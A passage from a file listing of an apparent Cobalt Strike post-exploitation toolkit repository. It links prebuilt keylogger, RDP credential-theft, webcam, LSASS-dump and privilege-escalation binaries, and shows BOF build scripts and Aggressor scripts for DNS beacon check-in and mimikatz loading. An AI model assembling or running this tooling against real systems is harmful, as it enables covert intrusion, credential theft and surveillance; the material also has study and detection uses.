/W0 /GS- /Tc delfirewallrule.c 4 | move /y delfirewallrule.obj delfirewallrule.o 5 | -------------------------------------------------------------------------------- /Cobatl Strike/DelTaskScheduler/deltaskscheduler.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelTaskScheduler/deltaskscheduler.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumExclusions/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | REM Compile-only build of enumexclusions.c: /c stops before linking, /Tc treats the file as C, /Od disables optimisation, /MT selects the static CRT, /W0 turns all warnings off and /GS- turns stack buffer security checks off; the .obj is then renamed to .o. NOTE(review): there is no errorlevel check between the two steps, so a failed compile can leave an older .o in place. 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumexclusions.c 4 | move /y enumexclusions.obj enumexclusions.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumWebClient/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | REM Compile-only build of enumwebclient.c: /c stops before linking, /Tc treats the file as C, /Od disables optimisation, /MT selects the static CRT, /W0 turns all warnings off and /GS- turns stack buffer security checks off; the .obj is then renamed to .o. NOTE(review): there is no errorlevel check between the two steps, so a failed compile can leave an older .o in place. 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumwebclient.c 4 | move /y enumwebclient.obj enumwebclient.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cd udrl && make $@ 3 | cd postex-udrl && make $@ 4 | # NOTE(review): both targets forward their own name ($@) to the udrl and postex-udrl sub-makes. Plain `make` instead of $(MAKE) does not pass -j/-n or jobserver state down, and neither target is declared .PHONY, so a file named all or clean would suppress the rule. 5 | clean: 6 | cd udrl && make $@ 7 | cd postex-udrl && make $@ 8 |
-------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/cobalt-strike-mandll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/cobalt-strike-mandll.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/option-stageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/option-stageless.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/scarecrow-console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/scarecrow-console.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/scarecrow-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/scarecrow-options.png -------------------------------------------------------------------------------- /Cobatl Strike/DllComHijacking/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllcomhijacking.c 4 | move /y dllcomhijacking.obj dllcomhijacking.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumLocalCert/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo 
/c /Od /MT /W0 /GS- /Tc enumlocalcert.c 4 | move /y enumlocalcert.obj enumlocalcert.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumTaskScheduler/enumtaskscheduler.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumTaskScheduler/enumtaskscheduler.o -------------------------------------------------------------------------------- /Cobatl Strike/Erebus/third/rdpthief/RdpThief_x64.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Erebus/third/rdpthief/RdpThief_x64.tmp -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/GoogleCSAgent.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/GoogleCSAgent.jar -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/meme.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/meme.jpg -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/server/controlwindow.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | BOOL CW_Register( WNDPROC lpfnWndProc ); 4 | HWND CW_Create( DWORD uhid, DWORD width, DWORD height ); 5 | -------------------------------------------------------------------------------- /Cobatl Strike/InjectPoolParty/bofcompile.bat: 
-------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc injectpoolparty.c 4 | move /y injectpoolparty.obj injectpoolparty.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/KeyloggerRawInput/keyloggerrawinput.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/KeyloggerRawInput/keyloggerrawinput.o -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.x86.obj -------------------------------------------------------------------------------- /Cobatl Strike/AddFirewallRule/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addfirewallrule.c 4 | move /y addfirewallrule.obj addfirewallrule.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/AddTaskScheduler/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addtaskscheduler.c 4 | move /y addtaskscheduler.obj addtaskscheduler.o 5 | 6 | 
-------------------------------------------------------------------------------- /Cobatl Strike/CaptureNetNTLM/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc capturenetntlm.c 4 | move /y capturenetntlm.obj capturenetntlm.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/DelTaskScheduler/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc deltaskscheduler.c 4 | move /y deltaskscheduler.obj deltaskscheduler.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/ExecuteCrossSession/executecrosssession.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/ExecuteCrossSession/executecrosssession.o -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc forcelockscreen.c 4 | move /y forcelockscreen.obj forcelockscreen.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/KeyloggerRawInput/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc keyloggerrawinput.c 4 | move /y keyloggerrawinput.obj keyloggerrawinput.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/NoPowerShell.exe.lnk: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/NoPowerShell.exe.lnk -------------------------------------------------------------------------------- /ArtifactKit/output/Readme.md: -------------------------------------------------------------------------------- 1 | This directory will contain the output from the compile process. You should probably include your artifact.cna in this directory for importing into cobalt strike. -------------------------------------------------------------------------------- /Cobatl Strike/AddTaskScheduler/addtaskschedulerNoSYSTEM.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddTaskScheduler/addtaskschedulerNoSYSTEM.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike DingtalkBot/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2024.8.30 2 | charset-normalizer==3.3.2 3 | DingtalkChatbot==1.5.7 4 | idna==3.8 5 | requests==2.32.3 6 | urllib3==2.2.2 7 | # NOTE(review): every package is pinned with ==, but there are no --hash entries, so pip cannot check the downloaded files against known digests (hash-checking mode, --require-hashes). Re-check these pinned releases against current security advisories before reuse. -------------------------------------------------------------------------------- /Cobatl Strike/EnumSecProducts/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | REM Compile-only build of enumsecproducts.c: /c stops before linking, /Tc treats the file as C, /Od disables optimisation, /MT selects the static CRT, /W0 turns all warnings off and /GS- turns stack buffer security checks off; the .obj is then renamed to .o. NOTE(review): there is no errorlevel check between the two steps, so a failed compile can leave an older .o in place. 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumsecproducts.c 4 | move /y enumsecproducts.obj enumsecproducts.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumTaskScheduler/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | REM Compile-only build of enumtaskscheduler.c: /c stops before linking, /Tc treats the file as C, /Od disables optimisation, /MT selects the static CRT, /W0 turns all warnings off and /GS- turns stack buffer security checks off; the .obj is then renamed to .o. NOTE(review): there is no errorlevel check between the two steps, so a failed compile can leave an older .o in place. A prebuilt enumtaskscheduler.o is also listed in this repository and nothing here ties it to this source - treat it as unverified. 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumtaskscheduler.c 4 | move /y enumtaskscheduler.obj enumtaskscheduler.o 5 | 6 |
-------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/CypherAES.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/CypherAES.exe -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/payload_x64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/payload_x64.bin -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/NoPowerShell32.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/NoPowerShell32.dll.lnk -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/NoPowerShell64.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/NoPowerShell64.dll.lnk -------------------------------------------------------------------------------- /Cobatl Strike/BOFs/MiniDumpWriteDump/minidumpwritedump.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOFs/MiniDumpWriteDump/minidumpwritedump.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.exe -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/bin/Debug/Encryptor.pdb -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.exe -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.pdb -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/logo.png -------------------------------------------------------------------------------- /Cobatl Strike/ExecuteCrossSession/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc executecrosssession.c 4 | move /y 
executecrosssession.obj executecrosssession.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/helper/OEFInjection.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/helper/OEFInjection.exe -------------------------------------------------------------------------------- /Cobatl Strike/LoadLib/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | REM Compile-only build of loadlib.c: /c stops before linking, /Tc treats the file as C, /Od disables optimisation, /MT selects the static CRT, /W0 turns all warnings off and /GS- turns stack buffer security checks off; the .obj is then renamed to .o and the last step writes a disassembly listing of it to loadlib.disasm. NOTE(review): there is no errorlevel check between the steps, so a failed compile can leave an older .o in place and the listing would then describe that older object. 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc loadlib.c 4 | move /y loadlib.obj loadlib.o 5 | dumpbin /disasm loadlib.o > loadlib.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/BOFs/MiniDumpWriteDump/Makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := minidumpwritedump 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | # Builds bof.c to $(BOFNAME).x64.o with the mingw-w64 cross compiler: -c stops before linking, -masm=intel selects Intel-syntax assembly, -Wno-multichar silences multi-character constant warnings. NOTE(review): `all` is not declared .PHONY, and the prebuilt minidumpwritedump.x64.o listed elsewhere in this repository is not tied to this recipe - treat it as unverified. 4 | all: 5 | $(CC_x64) -o $(BOFNAME).x64.o -c bof.c -masm=intel -Wno-multichar 6 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/internal/tasks.go: -------------------------------------------------------------------------------- 1 | package internal 2 | // Task maps a command id to a (code, payload) reply. Only the default arm exists, so every cmd returns 32 with the bytes "not a command", and data is never read. NOTE(review): the meaning of 32 is not defined in this file. 3 | func Task(cmd uint32, data []byte) (uint32, []byte) { 4 | switch cmd { 5 | default: 6 | return 32,[]byte("not a command") 7 | } 8 | } -------------------------------------------------------------------------------- /Cobatl Strike/Erebus/modules/third.cna: -------------------------------------------------------------------------------- 1 | menu "Third-party"{ 2 | include(script_resource("third/rdpthief/RdpThief.cna")); 3 | include(script_resource("third/EventLogMaster/eventlog.cna")); 4 | } -------------------------------------------------------------------------------- /Cobatl Strike/Google
CSAgent/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Wed Dec 08 11:43:19 CST 2021 3 | version=1.0-SNAPSHOT 4 | groupId=org.example 5 | artifactId=GoogleCSAgent 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/original-GoogleCSAgent.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/original-GoogleCSAgent.jar -------------------------------------------------------------------------------- /Cobatl Strike/HideFile/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc hidefile.c 4 | move /y hidefile.obj hidefile.o 5 | dumpbin /disasm hidefile.o > hidefile.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell.exe.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell.exe.lnk -------------------------------------------------------------------------------- /Cobatl Strike/Sweet Potato CS/README.md: -------------------------------------------------------------------------------- 1 | # SweetPotato_CS 2 | 修改的SweetPotato,使之可以用于CobaltStrike v4.0 3 | 4 | ![image-20200416161314722](https://tva1.sinaimg.cn/large/007S8ZIlgy1gdvoe062kej325f0u0jy7.jpg) -------------------------------------------------------------------------------- /Cobatl Strike/killswitch GUI/host/dnscheckin.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial_empty { 2 | 
bmode($1, "dns-txt"); 3 | bcheckin($1); 4 | bnote($1, "-needs to be evaluated!"); 5 | bsleep($1, 120, 20) 6 | } 7 | -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x64.dll -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/rasta-mouse/elevate/modules/cve-2015-1701.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/elevate/modules/cve-2016-0051.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/rasta-mouse/elevate/modules/cve-2016-0051.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/recon/app_count/applications_enum.x86.o 
-------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/recon/netjoin_query/netjoin_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/recon/netjoin_query/netjoin_query.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/dump.stg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Aggressor CNA/JuickyPotato_DLL/JuicyPotato/dump.stg -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-3.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor 
Kit/Pictures/Diagram-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Diagram-4.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120182036394.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120182036394.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120183734599.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120183734599.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120184525198.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120184525198.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185036090.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185036090.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185247702.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185247702.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185331891.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185331891.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185407471.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185407471.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185526954.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120185526954.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120190024068.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120190024068.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120190544328.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike 
Dec/笔记图片/image-20251120190544328.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120192844335.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/笔记图片/image-20251120192844335.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike MS17-010/aggressor.cna: -------------------------------------------------------------------------------- 1 | include(script_resource("modules/elevate.cna")); 2 | include(script_resource("modules/getinfo.cna")); 3 | include(script_resource("modules/pwndog.cna")); 4 | -------------------------------------------------------------------------------- /Cobatl Strike/KeyloggerRawInput/keyloggerrawinput-noForeground.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/KeyloggerRawInput/keyloggerrawinput-noForeground.o -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell32.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell32.dll.lnk -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell64.dll.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/No PowerShell trunk/DOTNET45/NoPowerShell64.dll.lnk -------------------------------------------------------------------------------- 
/Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Screenshot BOF/ScreenshotBOF/ScreenshotBOF.x86.obj -------------------------------------------------------------------------------- /Loader/AceLdr/src/retaddr.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOID a, PVOID b, PVOID c, PVOID d, PVOID e, PVOID f, PVOID g, PVOID h ); 4 | -------------------------------------------------------------------------------- /Mimikatz Kit/mimikatz.cna: -------------------------------------------------------------------------------- 1 | set MIMIKATZ_INTERNAL { 2 | $mimidllpath = script_resource($1); 3 | warn("Loading custom mimikatz dll from: " . 
$mimidllpath); 4 | return $mimidllpath; 5 | } 6 | 7 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/build/tick.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | # cpu_clock: returns the 64-bit time-stamp counter in rax; overwrites rdx and the flags. 3 | .global cpu_clock 4 | .type cpu_clock, @function 5 | # NOTE(review): rdtsc is not a serializing instruction, so the read can be reordered against neighbouring instructions. `.type ..., @function` is ELF directive syntax - presumably an ELF toolchain, confirm. 6 | cpu_clock: 7 | rdtsc # edx:eax = time-stamp counter (upper halves of rax and rdx are cleared in 64-bit mode) 8 | shl rdx, 32 # move the high 32 bits into bits 63:32 9 | or rax, rdx # rax = (high << 32) combined with low 10 | ret # result is left in rax 11 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/build/tick.s: -------------------------------------------------------------------------------- 1 | .intel_syntax noprefix 2 | # cpu_clock: returns the 64-bit time-stamp counter in rax; overwrites rdx and the flags. 3 | .global cpu_clock 4 | .type cpu_clock, @function 5 | # NOTE(review): rdtsc is not a serializing instruction, so the read can be reordered against neighbouring instructions. `.type ..., @function` is ELF directive syntax - presumably an ELF toolchain, confirm. 6 | cpu_clock: 7 | rdtsc # edx:eax = time-stamp counter (upper halves of rax and rdx are cleared in 64-bit mode) 8 | shl rdx, 32 # move the high 32 bits into bits 63:32 9 | or rax, rdx # rax = (high << 32) combined with low 10 | ret # result is left in rax 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/wef_detect/wef_detect.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/env_assessment/wef_detect/wef_detect.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/signal-token.png -------------------------------------------------------------------------------- /Cobatl Strike/Google 